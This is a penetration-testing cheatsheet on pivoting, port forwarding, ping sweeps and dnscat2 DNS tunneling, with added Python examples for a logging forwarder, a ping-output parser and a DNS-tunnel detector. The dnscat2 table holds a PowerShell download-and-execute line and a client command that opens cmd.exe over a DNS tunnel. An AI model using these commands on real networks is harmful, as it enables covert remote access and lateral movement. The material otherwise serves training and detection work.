Pivoting, Tunneling & Port Forwarding
Pivoting, Tunneling & Port Forwarding Cheatsheet
Port Forwarding & Tunneling
| Options | Commands | Description | 
|---|---|---|
| Local Port Forwarding with SSH | ssh -L 8080:localhost:80 user@remote |  Forward local port 8080 to remote server’s port 80 via SSH | 
| Remote Port Forwarding with SSH | ssh -R 8080:localhost:80 user@remote |  Forward remote port 8080 to local machine’s port 80 via SSH | 
| Dynamic Port Forwarding with SSH (SOCKS Proxy) | ssh -D 1080 user@remote |  Create a SOCKS proxy on local port 1080 via SSH | 
| Port Forwarding with Netcat (TCP) | nc -lvp 8080 -c "nc target 80" |  Forward local port 8080 to target’s port 80 using Netcat | 
| Simple HTTP Tunneling with socat | socat TCP-LISTEN:8080,fork TCP:target:80 |  Tunnel local port 8080 to target’s port 80 using socat | 
| Transparent Proxy with sshuttle | sshuttle -r user@remote 0/0 -vv |  Transparent (non-SOCKS) proxy over SSH, forwarding all traffic through the remote machine | 
| Reverse SSH Tunnel | ssh -fN -R 9090:localhost:22 user@remote |  Set up a reverse SSH tunnel to allow the remote server to access your local SSH service | 
| Chisel Reverse HTTP Tunnel | ./chisel server -p 8080 --reverse (Server) ./chisel client http://<server-ip>:8080 R:9000:127.0.0.1:9000 (Client) |  Set up a reverse HTTP tunnel using Chisel, forwarding remote port 9000 to local port 9000 | 
| SSHuttle for VPN-like Access | sshuttle --dns -r user@remote 0/0 |  Route all traffic through a remote server with DNS resolution, similar to a VPN | 
| Pivot with Metasploit (Meterpreter) | run autoroute -s 10.0.0.0/24 |  Add a route through a compromised machine | 
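The entries above all do one job: accept a connection on a listening port and relay bytes to another host and port. The following is an added example, not part of the cheatsheet or of any of the tools it lists, that implements that relay in Python so the mechanism behind `socat TCP-LISTEN:8080,fork TCP:target:80` is visible: a listener, one thread per accepted client, and two byte pumps (one per direction) that propagate half-closes correctly. It also keeps a per-session log line, which is the minimum a defender wants from any forwarder they run. The echo server and `demo()` are constructed test fixtures.

```python
"""Minimal TCP port forwarder (added example; not the cheatsheet's own code)."""
import socket
import threading
from typing import List, Tuple


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src signals EOF, then half-close dst so the
    peer sees the same EOF. Without the half-close, a client that shuts down
    its write side would hang waiting for the server's final bytes."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client: socket.socket, target: Tuple[str, int], log: List[str]) -> None:
    """Connect to the target and pump bytes in both directions for one session."""
    peer = client.getpeername()
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError as exc:
        log.append(f"{peer[0]}:{peer[1]} -> {target[0]}:{target[1]} connect failed: {exc}")
        client.close()
        return
    upstream.settimeout(None)
    log.append(f"{peer[0]}:{peer[1]} -> {target[0]}:{target[1]}")  # one line per session
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


class Forwarder:
    """Listen on `bind` and forward every accepted connection to `target`
    (the same thing socat's TCP-LISTEN:...,fork TCP:target:port does)."""

    def __init__(self, bind: Tuple[str, int], target: Tuple[str, int]) -> None:
        self.target = target
        self.log: List[str] = []
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind(bind)
        self._srv.listen(16)
        self.port = self._srv.getsockname()[1]  # useful when bound to port 0
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self) -> None:
        while True:
            try:
                client, _ = self._srv.accept()
            except OSError:
                return  # listener was closed
            threading.Thread(target=_relay, args=(client, self.target, self.log),
                             daemon=True).start()

    def close(self) -> None:
        self._srv.close()


def _echo_server() -> Tuple[socket.socket, int]:
    """Constructed stand-in for the 'target' service: echoes one connection."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve() -> None:
        conn, _ = srv.accept()
        with conn:
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                conn.sendall(chunk)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def demo(payload: bytes = b"hello through the tunnel") -> bytes:
    """Send payload through the forwarder to the echo server; return what comes back."""
    echo_srv, echo_port = _echo_server()
    fwd = Forwarder(("127.0.0.1", 0), ("127.0.0.1", echo_port))
    received = b""
    with socket.create_connection(("127.0.0.1", fwd.port), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # EOF travels client -> forwarder -> echo server
        while True:
            chunk = c.recv(4096)
            if not chunk:
                break
            received += chunk
    fwd.close()
    echo_srv.close()
    return received


if __name__ == "__main__":
    print(demo())
```

Binding to `127.0.0.1` keeps the listener off the network; binding to `0.0.0.0` is what turns a forwarder into a pivot, and the `log` list is where you would hook connection auditing.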
Ping Sweep
| Options | Commands | Description | 
|---|---|---|
| Ping Sweep with Command Prompt | for /L %i in (1,1,254) do @ping -n 1 -w 100 192.168.1.%i \| find "Reply" |  Perform a ping sweep using a loop in Command Prompt | 
| Ping Sweep with PowerShell | 1..254 \| ForEach-Object {Test-Connection -ComputerName 192.168.1.$_ -Count 1 -Quiet} |  Perform a ping sweep using a loop in PowerShell | 
| Ping Sweep with Bash | for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip \| grep "64 bytes"; done |  Perform a ping sweep using a loop in Bash | 
| Ping Sweep with Bash (parallel) | for ip in {1..254}; do (ping -c 1 172.16.5.$ip \| grep "bytes from" &); done |  Perform a ping sweep using a loop in Bash, backgrounding each ping so the sweep runs in parallel | 
| Ping Sweep with Nmap | nmap -sn 192.168.1.0/24 |  Use Nmap to perform a ping sweep across a subnet | 
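The `find "Reply"` and `grep "bytes from"` filters above are quick but have a known false positive: on Windows, a dead host on a routed network produces `Reply from <gateway>: Destination host unreachable.`, which `find "Reply"` happily counts. The following is an added example, not part of the cheatsheet, that parses captured ping output from both Windows and Linux/BSD, requires the `bytes=` field that only a real echo reply carries, and records the reply TTL so the result tells you a little more than "alive". The sample output lines are constructed.

```python
"""Parse ping-sweep output into live hosts (added example; not from the cheatsheet)."""
import re
from typing import Dict, Iterable, Optional

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# Linux/BSD ping: "64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=0.42 ms"
LINUX_REPLY = re.compile(r"^\d+ bytes from " + IPV4)
# Windows ping: "Reply from 192.168.1.10: bytes=32 time<1ms TTL=128"
# Requiring "bytes=" right after the address excludes the gateway's
# "Reply from 192.168.1.1: Destination host unreachable." line, which the
# cheatsheet's `find "Reply"` filter would count as a live host.
WINDOWS_REPLY = re.compile(r"^Reply from " + IPV4 + r": bytes=\d+")
TTL = re.compile(r"ttl=(\d+)", re.IGNORECASE)


def live_hosts(lines: Iterable[str]) -> Dict[str, Optional[int]]:
    """Map every host that answered an echo request to its reply TTL (None if absent).
    Accepts Windows and Linux/BSD output mixed together; first reply per host wins."""
    hosts: Dict[str, Optional[int]] = {}
    for raw in lines:
        line = raw.strip()
        m = WINDOWS_REPLY.match(line) or LINUX_REPLY.match(line)
        if not m:
            continue
        ttl = TTL.search(line)
        hosts.setdefault(m.group(1), int(ttl.group(1)) if ttl else None)
    return hosts


def ttl_hint(ttl: Optional[int]) -> str:
    """Rough OS family from the reply TTL, assuming the usual initial values
    (64 for unix-like, 128 for Windows, 255 for network gear) minus a few hops.
    A hint only: TTLs can be changed by the host or rewritten in transit."""
    if ttl is None:
        return "unknown"
    for ceiling, name in ((64, "unix-like"), (128, "windows"), (255, "network device")):
        if ttl <= ceiling:
            return name
    return "unknown"


# Constructed sample output, as the cheatsheet's loops would print it.
WINDOWS_SAMPLE = [
    "Reply from 192.168.1.1: bytes=32 time<1ms TTL=255",
    "Reply from 192.168.1.10: bytes=32 time=2ms TTL=128",
    "Reply from 192.168.1.1: Destination host unreachable.",  # gateway answering for a dead host
    "Request timed out.",
    "Reply from 192.168.1.20: bytes=32 time=1ms TTL=64",
]
LINUX_SAMPLE = [
    "PING 172.16.5.1 (172.16.5.1) 56(84) bytes of data.",
    "64 bytes from 172.16.5.1: icmp_seq=1 ttl=64 time=0.311 ms",
    "From 172.16.5.1 icmp_seq=1 Destination Host Unreachable",
    "64 bytes from 172.16.5.25: icmp_seq=1 ttl=128 time=1.02 ms",
    "--- 172.16.5.25 ping statistics ---",
]


def report(lines: Iterable[str]) -> Dict[str, str]:
    """Host -> OS hint, the form a sweep summary is usually wanted in."""
    return {ip: ttl_hint(ttl) for ip, ttl in live_hosts(lines).items()}


if __name__ == "__main__":
    for ip, hint in report(WINDOWS_SAMPLE + LINUX_SAMPLE).items():
        print(f"{ip:16} {hint}")
```

Feed it the real thing with something like `ping ... | python3 sweep_parse.py` after replacing the constructed samples with `sys.stdin`; the regexes are the part that matters.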
DNS Tunneling with dnscat2
| Options | Commands | Description | 
|---|---|---|
| Start dnscat2 Server | ruby dnscat2.rb |  Start the dnscat2 server to listen for incoming connections via DNS | 
| Connect dnscat2 Client on Linux | ./dnscat --dns server=<server_ip> --domain <your_domain> |  Start dnscat2 client on a Linux machine and connect to the specified dnscat2 server using your domain | 
| Connect dnscat2 Client on Windows (using PowerShell) | IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/iagox86/dnscat2/master/client/dnscat2.ps1'); dnscat2 -dns server=<server_ip> -domain <your_domain> |  Download and run dnscat2 client on a Windows machine using PowerShell, and connect to the specified dnscat2 server and domain | 
| dnscat2 Client Options | ./dnscat --dns server=<server_ip> --domain <your_domain> --exec cmd.exe |  Example of dnscat2 client running with options, executing cmd.exe on the target machine |
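From the defender's side, dnscat2-style tunnels share a shape that stands out in a resolver log: one client, one zone, many never-repeated subdomains made of long encoded labels, often using TXT/CNAME/MX rather than A records. The following is an added example, not part of the cheatsheet or of dnscat2, that scores a query log with those heuristics. The log line format (`<time> <client_ip> <qtype> <qname>`), the thresholds, and the zone `dns-demo.example` are assumptions; the sample log is constructed, with the tunnel-like labels built from rotated hex alphabets so their entropy is known exactly.

```python
"""Heuristic DNS-tunnel detector over a query log (added example; not dnscat2's code)."""
import math
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

Key = Tuple[str, str]  # (client_ip, zone)


def shannon_entropy(text: str) -> float:
    """Bits per character. Hex/base32-encoded payloads sit near 4-5; real hostnames lower."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in (text.count(ch) for ch in set(text)))


def parse_log(lines: Iterable[str]):
    """Assumed log format: '<time> <client_ip> <qtype> <qname>', one query per line."""
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of aborting the run
        _, client, qtype, qname = parts
        yield client, qtype.upper(), qname.rstrip(".").lower()


def split_zone(qname: str, depth: int = 2) -> Tuple[str, str]:
    """'abc.def.example.net' -> ('example.net', 'abc.def'). depth=2 is a simplification;
    a public-suffix list handles co.uk-style zones properly."""
    labels = qname.split(".")
    return ".".join(labels[-depth:]), ".".join(labels[:-depth])


def zone_stats(lines: Iterable[str]) -> Dict[Key, Dict[str, float]]:
    """Per (client, zone): query count, unique-subdomain ratio, mean subdomain
    length, mean label entropy, and share of the record types dnscat2 uses by default."""
    acc = defaultdict(lambda: {"queries": 0, "subs": set(), "sub_len": 0,
                               "entropy": 0.0, "rare_types": 0})
    for client, qtype, qname in parse_log(lines):
        zone, sub = split_zone(qname)
        s = acc[(client, zone)]
        s["queries"] += 1
        s["subs"].add(sub)
        s["sub_len"] += len(sub)
        s["entropy"] += shannon_entropy(sub.replace(".", ""))
        if qtype in ("TXT", "CNAME", "MX"):
            s["rare_types"] += 1
    out: Dict[Key, Dict[str, float]] = {}
    for key, s in acc.items():
        q = s["queries"]
        out[key] = {"queries": q, "unique_ratio": len(s["subs"]) / q,
                    "mean_sub_len": s["sub_len"] / q, "mean_entropy": s["entropy"] / q,
                    "rare_type_ratio": s["rare_types"] / q}
    return out


def detect_tunnels(lines: Iterable[str], min_queries: int = 5, min_unique: float = 0.9,
                   min_len: int = 30, min_entropy: float = 3.0) -> List[Key]:
    """Flag (client, zone) pairs that look like a tunnel. Thresholds are assumptions;
    tune them against your own resolver's baseline (CDNs and anti-spam lookups
    also produce long unique labels, so rare_type_ratio is reported for triage)."""
    flagged = []
    for key, m in zone_stats(lines).items():
        if (m["queries"] >= min_queries and m["unique_ratio"] >= min_unique
                and m["mean_sub_len"] >= min_len and m["mean_entropy"] >= min_entropy):
            flagged.append(key)
    return sorted(flagged)


HEX = "0123456789abcdef"


def _constructed_tunnel_queries(n: int = 8) -> List[str]:
    """Constructed dnscat2-like queries: 48-char hex labels (entropy exactly 4.0),
    each unique, cycling through TXT/CNAME/MX."""
    types = ["TXT", "CNAME", "MX"]
    return [f"12:00:{i:02d} 10.0.0.7 {types[i % 3]} {(HEX[i:] + HEX[:i]) * 3}.dns-demo.example"
            for i in range(n)]


SAMPLE_LOG = [
    "11:59:01 10.0.0.5 A www.example.com",
    "11:59:02 10.0.0.5 A mail.example.com",
    "11:59:03 10.0.0.5 A www.example.com",
    "11:59:04 10.0.0.7 A api.github.com",
    "not a log line",
] + [f"11:59:1{i} 10.0.0.7 A img{i}.cdn.example.org" for i in range(6)] \
  + _constructed_tunnel_queries()


if __name__ == "__main__":
    for client, zone in detect_tunnels(SAMPLE_LOG):
        print(f"possible DNS tunnel: {client} -> {zone}", zone_stats(SAMPLE_LOG)[(client, zone)])
```

The CDN-style queries under `example.org` are also all unique, which is why length and entropy are required in addition to uniqueness; on a real network, a per-zone allow-list for known services cuts the remaining noise.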